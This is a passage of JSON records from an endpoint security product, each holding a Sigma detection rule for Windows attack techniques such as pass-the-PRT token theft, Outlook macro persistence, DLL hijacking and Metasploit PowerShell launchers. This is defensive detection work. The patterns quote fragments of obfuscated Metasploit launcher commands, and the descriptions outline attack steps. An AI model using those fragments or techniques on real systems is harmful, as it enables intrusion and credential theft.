ProcessAncestors|contains: '?:\\Windows\\CCM\\Ccm32BitLauncher.exe'\n\n exclusion_wmi:\n ProcessAncestors|contains:\n - '|?:\\Windows\\System32\\winrshost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n - '|?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n - '|?:\\Windows\\System32\\wbem\\WmiPrvSE.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n\n exclusion_dagent:\n ProcessAncestors|contains: '?:\\Program Files\\Altiris\\Dagent\\dagent.exe'\n\n exclusion_landesk:\n ProcessAncestors|contains: '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdistbat.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eee0e55e-e901-418f-bc61-5d51a8cf1925",
"rule_name": "User Added to RDP Users Group via net.exe",
"rule_description": "Detects RDP permissions being given to a user through the \"net\" utility.\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.\nIt is recommended to investigate if the user is expected to be added to this group and to look for other suspicious actions by the parent process.\n",
"rule_creation_date": "2022-12-01",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1021.001",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eeee4874-47a8-4bbc-8367-54a2d46d25b5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297489Z",
"creation_date": "2026-03-23T11:45:35.297492Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297496Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/",
"https://github.com/dirkjanm/ROADtoken",
"https://attack.mitre.org/techniques/T1550/001/"
],
"name": "t1550_001_azure_pass_the_prt_via_browsercore.yml",
"content": "title: Azure Pass-the-PRT via BrowserCore.exe\nid: eeee4874-47a8-4bbc-8367-54a2d46d25b5\ndescription: |\n Detects a suspicious BrowserCore.exe process creation which could indicate a pass-the-PRT attempt.\n A PRT (Primary Refresh Token) provide SSO on Azure AD joined, registered, or hybrid joined devices for both web browsers and native apps.\n BrowserCore.exe is a core component of Windows and it serves as a browser add-on that allows Microsoft users to connect via Azure and Microsoft websites.\n Threat actors can exploit BrowserCore.exe by launching the process, sending a request through its standard input, and extracting the PRT (labeled “x-ms-RefreshTokenCredential”) from its standard output.\n The obtained PRT can then be used as a cookie to access sensitive cloud resources on behalf of the victim user.\n It is recommended to check the parent process for suspicious activities.\nreferences:\n - https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/\n - https://github.com/dirkjanm/ROADtoken\n - https://attack.mitre.org/techniques/T1550/001/\ndate: 2026/03/09\nmodified: 2026/03/12\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1550.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessOriginalFileName: 'BrowserCore.exe'\n\n exclusion_legit_browser_usage:\n ProcessParentProcessName: 'cmd.exe'\n ProcessParentCommandLine|contains: '> \\\\\\\\.\\\\pipe\\\\'\n ProcessGrandparentProcessName:\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'vivaldi.exe'\n - 'comet.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eeee4874-47a8-4bbc-8367-54a2d46d25b5",
"rule_name": "Azure Pass-the-PRT via BrowserCore.exe",
"rule_description": "Detects a suspicious BrowserCore.exe process creation which could indicate a pass-the-PRT attempt.\nA PRT (Primary Refresh Token) provide SSO on Azure AD joined, registered, or hybrid joined devices for both web browsers and native apps.\nBrowserCore.exe is a core component of Windows and it serves as a browser add-on that allows Microsoft users to connect via Azure and Microsoft websites.\nThreat actors can exploit BrowserCore.exe by launching the process, sending a request through its standard input, and extracting the PRT (labeled “x-ms-RefreshTokenCredential”) from its standard output.\nThe obtained PRT can then be used as a cookie to access sensitive cloud resources on behalf of the victim user.\nIt is recommended to check the parent process for suspicious activities.\n",
"rule_creation_date": "2026-03-09",
"rule_modified_date": "2026-03-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1550.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ef105561-121c-4adb-8707-a231a60db162",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295727Z",
"creation_date": "2026-03-23T11:45:35.295730Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295737Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zscaler.com/blogs/security-research/apt28-leverages-cve-2026-21509-operation-neusploit",
"https://attack.mitre.org/techniques/T1137/"
],
"name": "t1137_outlook_load_macro_boot.yml",
"content": "title: Outlook Configuration Changed to Allow Macro Execution on Startup\nid: ef105561-121c-4adb-8707-a231a60db162\ndescription: |\n Detects a modification of the Outlook configuration to allow macro code execution on startup.\n If the value is set to 1, VBA code from files located in %appdata%\\Microsoft\\Outlook\\ is executed on startup.\n It is recommended to determine if this is a wanted action by the system administrator or third party software, and if so, to whitelist the product or script responsible for the action.\n If it is part of a persistence attempt, it is recommended to revert the configuration change and to look for other suspicious actions on the host.\nreferences:\n - https://www.zscaler.com/blogs/security-research/apt28-leverages-cve-2026-21509-operation-neusploit\n - https://attack.mitre.org/techniques/T1137/\ndate: 2026/02/03\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\S*\\Software\\Microsoft\\Office\\\\*\\Outlook\\LoadMacroProviderOnBoot'\n Details: 'DWORD (0x00000001)'\n\n exclusion_ivanti:\n ProcessImage: '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrgrid.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n\n exclusion_loadstate:\n ProcessOriginalFileName: 'LoadState.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_office:\n ProcessOriginalFileName:\n - 'Outlook.exe'\n - 'WinWord.exe'\n - 'MSACCESS.EXE'\n - 'Excel.exe'\n - 'POWERPNT.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ef105561-121c-4adb-8707-a231a60db162",
"rule_name": "Outlook Configuration Changed to Allow Macro Execution on Startup",
"rule_description": "Detects a modification of the Outlook configuration to allow macro code execution on startup.\nIf the value is set to 1, VBA code from files located in %appdata%\\Microsoft\\Outlook\\ is executed on startup.\nIt is recommended to determine if this is a wanted action by the system administrator or third party software, and if so, to whitelist the product or script responsible for the action.\nIf it is part of a persistence attempt, it is recommended to revert the configuration change and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2026-02-03",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1137"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ef1115af-eb3a-4fbd-9cc9-66401a672e40",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071328Z",
"creation_date": "2026-03-23T11:45:34.071330Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071335Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_suspicious_remote_thread_uncommon_process.yml",
"content": "title: Suspicious Remote Thread Created from Uncommon Process\nid: ef1115af-eb3a-4fbd-9cc9-66401a672e40\ndescription: |\n Detects remote threads that are not mapped to a legitimate DLL/executable and created in an uncommon process.\n Adversaries may inject malicious code in web browsers (ie. Firefox, Chrome, Edge...) or in LSASS to steal sensitive information such as credentials. If the thread is injected in another process, it could be an attempt at performing malicious activity within a legitimate process.\n It is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/12/11\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n SourceImage|endswith:\n # Office\n - '\\winword.exe'\n - '\\excel.exe'\n - '\\powerpnt.exe'\n - '\\outlook.exe'\n # Web browsers\n - '\\chrome.exe'\n - '\\msedge.exe'\n - '\\firefox.exe'\n - '\\iexplore.exe'\n - '\\plugin-container.exe'\n # Adobe\n - '\\acrobat.exe'\n - '\\AcroCEF.exe'\n # Web servers\n - '\\w3wp.exe'\n - '\\httpd.exe'\n - '\\apache.exe'\n - '\\mysql.exe'\n\n filter_module:\n StartModule|contains:\n - '.dll'\n - '.exe'\n - '.com'\n\n exclusion_firefox_flash:\n SourceImage|endswith: '\\firefox.exe'\n TargetImage|contains:\n - 'FlashPlayerPlugin'\n - 'pingsender.exe'\n\n exclusion_edge:\n SourceImage|endswith: '\\Microsoft\\Edge\\Application\\msedge.exe'\n TargetImage|endswith: '\\Microsoft\\Edge\\Application\\msedge.exe'\n\n exclusion_chrome:\n SourceImage|endswith: '\\Google\\Chrome\\Application\\chrome.exe'\n TargetImage|endswith: '\\Google\\Chrome\\Application\\chrome.exe'\n\n # TargetProcess fields not yet available\n # exclusion_chrome_smime:\n # TargetProcessCommandLine|contains: 'SmimeOutlookWebChrome\\Microsoft.Outlook.StdioListeningNativeApp.exe'\n # TargetImage|endswith: '\\cmd.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ef1115af-eb3a-4fbd-9cc9-66401a672e40",
"rule_name": "Suspicious Remote Thread Created from Uncommon Process",
"rule_description": "Detects remote threads that are not mapped to a legitimate DLL/executable and created in an uncommon process.\nAdversaries may inject malicious code in web browsers (ie. Firefox, Chrome, Edge...) or in LSASS to steal sensitive information such as credentials. If the thread is injected in another process, it could be an attempt at performing malicious activity within a legitimate process.\nIt is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\n",
"rule_creation_date": "2023-12-11",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ef8015cf-cdc5-4872-ba60-ed79840c063e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.069753Z",
"creation_date": "2026-03-23T11:45:34.069755Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.069760Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/tactics/TA0002/",
"https://attack.mitre.org/techniques/T1564/"
],
"name": "t1564_suspicious_executable_extension.yml",
"content": "title: Process Executed with Suspicious File Extension\nid: ef8015cf-cdc5-4872-ba60-ed79840c063e\ndescription: |\n Detects execution of an executable with a suspicious extension.\n Attackers may rename executable files with benign extension to hide malicious payloads as legitimate files.\n This technique can also be used to lure users into clicking on the file that would then be executed using another technique (e.g default application tampering).\n It is recommended to analyze the parent and child processes to look for malicious content or actions.\n It is also recommended to investigate the process responsible for writing the file to disk.\nreferences:\n - https://attack.mitre.org/tactics/TA0002/\n - https://attack.mitre.org/techniques/T1564/\ndate: 2021/10/13\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.t1564\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith:\n - '.txt'\n - '.pdf'\n - '.doc'\n - '.docx'\n - '.ppt'\n - '.pptx'\n - '.iso'\n - '.xls'\n - '.xlsx'\n - '.xlsm'\n - '.zip'\n - '.rar'\n - '.7z'\n - '.pdf.scr' # https://twitter.com/ankit_anubhav/status/1552325050212093953\n\n condition: selection\nlevel: critical\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ef8015cf-cdc5-4872-ba60-ed79840c063e",
"rule_name": "Process Executed with Suspicious File Extension",
"rule_description": "Detects execution of an executable with a suspicious extension.\nAttackers may rename executable files with benign extension to hide malicious payloads as legitimate files.\nThis technique can also be used to lure users into clicking on the file that would then be executed using another technique (e.g default application tampering).\nIt is recommended to analyze the parent and child processes to look for malicious content or actions.\nIt is also recommended to investigate the process responsible for writing the file to disk.\n",
"rule_creation_date": "2021-10-13",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1564"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ef915928-c4a8-4228-9280-d6772e046120",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073208Z",
"creation_date": "2026-03-23T11:45:34.073210Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073214Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/rapid7/metasploit-framework/blob/b0455d36e3a1e7c687d3358526e727586d5d4ccc/modules/exploits/windows/smb/psexec.rb#L134",
"https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/smb/client/psexec.rb#L255",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_metasploit_powershell_launcher.yml",
"content": "title: Metasploit PowerShell Launcher Detected\nid: ef915928-c4a8-4228-9280-d6772e046120\ndescription: |\n Detects suspicious PowerShell script block patterns that are related to the Metasploit Attack Framework.\n Metasploit is a widely-used penetration testing and exploitation framework that provides tools for vulnerability assessment, exploitation, privilege escalation, and post-exploitation activities.\n It is recommended to investigate the PowerShell script, terminate associated processes, and conduct memory analysis.\nreferences:\n - https://github.com/rapid7/metasploit-framework/blob/b0455d36e3a1e7c687d3358526e727586d5d4ccc/modules/exploits/windows/smb/psexec.rb#L134\n - https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/smb/client/psexec.rb#L255\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2020/11/03\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.Metasploit\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_1:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n selection_2:\n # \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -w hidden -noni -e \n # \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -nop -w hidden -e \n CommandLine|contains: ' -nop -w hidden '\n selection_3:\n CommandLine|contains:\n # Hx4sIA = Gzip Magic in base64\n # Handle POWERSHELL:encode_final_payload being active or not.\n - \" -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIA\"\n # Same as previous line but with POWERSHELL:encode_inner_payload = true\n - '-e JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwBIADQAcwBJAEEA'\n condition: all of selection_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ef915928-c4a8-4228-9280-d6772e046120",
"rule_name": "Metasploit PowerShell Launcher Detected",
"rule_description": "Detects suspicious PowerShell script block patterns that are related to the Metasploit Attack Framework.\nMetasploit is a widely-used penetration testing and exploitation framework that provides tools for vulnerability assessment, exploitation, privilege escalation, and post-exploitation activities.\nIt is recommended to investigate the PowerShell script, terminate associated processes, and conduct memory analysis.\n",
"rule_creation_date": "2020-11-03",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ef941845-bc17-47b0-ad9a-b00bef1d37b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.596942Z",
"creation_date": "2026-03-23T11:45:34.596948Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596969Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_diskraid.yml",
"content": "title: DLL Hijacking via diskraid.exe\nid: ef941845-bc17-47b0-ad9a-b00bef1d37b2\ndescription: |\n Detects potential Windows DLL Hijacking via diskraid.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'diskraid.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ef941845-bc17-47b0-ad9a-b00bef1d37b2",
"rule_name": "DLL Hijacking via diskraid.exe",
"rule_description": "Detects potential Windows DLL Hijacking via diskraid.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "efc62da6-bd3f-4a4e-9396-c110c97ca805",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626371Z",
"creation_date": "2026-03-23T11:45:34.626373Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626378Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://itm4n.github.io/windows-registry-rpceptmapper-eop/",
"https://blog.0patch.com/2020/11/0day-in-windows-7-and-server-2008-r2.html",
"https://attack.mitre.org/techniques/T1574/011/"
],
"name": "t1574_011_registry_services_insecure_permission_performance.yml",
"content": "title: RpcEptMapper Insecure Permissions Exploited\nid: efc62da6-bd3f-4a4e-9396-c110c97ca805\ndescription: |\n Detects the exploitation of the Windows RpcEptMapper Service Insecure Registry Permissions vulnerability.\n This is an Elevation of Privilege (EoP) flaw that arises from improper permissions set on certain Windows registry keys associated with the RpcEptMapper (RPC Endpoint Mapper) service.\n This rule detects when a value is written under the Performance subkey in Dnscache or RpcEptMapper (insecure registry keys in win7 / 2008 R2).\n It is recommended to investigate the registry modification to determine its legitimacy and the process making the registry modification for other suspicious behavior.\nreferences:\n - https://itm4n.github.io/windows-registry-rpceptmapper-eop/\n - https://blog.0patch.com/2020/11/0day-in-windows-7-and-server-2008-r2.html\n - https://attack.mitre.org/techniques/T1574/011/\ndate: 2020/11/27\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.011\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.RpcEptMapper\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set:\n EventType: 'SetValue'\n TargetObject:\n - '*\\Services\\Dnscache\\Performance\\\\*'\n - '*\\Services\\RpcEptMapper\\Performance\\\\*'\n\n filter_empty:\n Details: '(Empty)'\n\n selection_rename:\n EventType: 'RenameKey'\n NewName:\n - '*\\Services\\Dnscache\\Performance\\\\*'\n - '*\\Services\\RpcEptMapper\\Performance\\\\*'\n\n exclusion_dword:\n Details: 'DWORD (0x????????)'\n\n exclusion_performance:\n TargetObject: '*\\Services\\\\*\\Performance\\Disable Performance Counters'\n\n condition: ((selection_set and not filter_empty) or selection_rename) and not 1 of exclusion_*\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "efc62da6-bd3f-4a4e-9396-c110c97ca805",
"rule_name": "RpcEptMapper Insecure Permissions Exploited",
